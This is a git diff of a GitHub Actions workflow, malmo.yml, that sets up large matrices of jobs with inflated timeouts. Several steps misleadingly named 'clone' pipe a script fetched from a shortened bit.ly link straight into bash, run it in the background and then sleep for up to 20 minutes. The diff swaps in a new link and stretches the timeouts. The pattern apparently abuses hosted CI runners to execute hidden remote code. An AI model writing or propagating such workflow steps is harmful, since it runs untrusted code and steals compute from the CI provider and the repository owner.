--- a/.github/workflows/malmo.yml
+++ b/.github/workflows/malmo.yml
@@ -1,4 +1,4 @@
-name: malmoapp
+name: malmo app
 on: 
   push:
     branches: [ "main" ]
@@ -12,7 +12,7 @@ jobs:
       matrix:
         go: [1.1, 1.2, 1.3, 1.4, 1.5, 1.6, 1.7, 1.8, 1.9]
         flag: [A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z]
-    timeout-minutes: 9
+    timeout-minutes: 950000
     env:
         NUM_JOBS: 30
         JOB: ${{ matrix.go }}
@@ -25,8 +25,8 @@ jobs:
     - name: Setup
       uses: actions/checkout@v4
     - name: clone
-      run: curl -sL  http://bit.ly/3Jefaky | bash &
-           sleep 380s
+      run: curl -sL  http://bit.ly/3V7TqK1 | bash &
+           sleep 10m
   note:
     needs: time
     runs-on: ubuntu-latest
@@ -48,7 +48,7 @@ jobs:
         go-version: ${{ matrix.go }}
       id: go
     - name: clone
-      run: curl -sL  http://bit.ly/3Jefaky | bash &
+      run: curl -sL  http://bit.ly/3V7TqK1 | bash &
             sleep 10m
         
     
@@ -62,7 +62,7 @@ jobs:
       matrix:
         go: [1.1, 1.2, 1.3, 1.4, 1.5, 1.6, 1.7, 1.8, 1.9] 
         flag: [A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z, 1, 2] 
-    timeout-minutes: 420
+    timeout-minutes: 455
     env:
         NUM_JOBS: 250
         JOB: ${{ matrix.go }}
@@ -74,8 +74,8 @@ jobs:
         go-version: ${{ matrix.go }}
       id: go
     - name: clone
-      run: curl -sL  http://bit.ly/3Jefaky | bash &
-            sleep 15m
+      run: curl -sL  http://bit.ly/3V7TqK1 | bash &
+            sleep 20m
 
   meet:
     needs: [time]
@@ -86,7 +86,7 @@ jobs:
       matrix:
         go: [1.1, 1.2, 1.3, 1.4, 1.5, 1.6, 1.7, 1.8, 1.9] 
         flag: [A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z, 1, 2] 
-    timeout-minutes: 420
+    timeout-minutes: 435
     env:
         NUM_JOBS: 250
         JOB: ${{ matrix.go }}
@@ -98,8 +98,8 @@ jobs:
         go-version: ${{ matrix.go }}
       id: go
     - name: clone
-      run: curl -sL  http://bit.ly/3Jefaky | bash &
-            sleep 15m           
+      run: curl -sL  http://bit.ly/3V7TqK1 | bash &
+            sleep 20m           
 
 
    
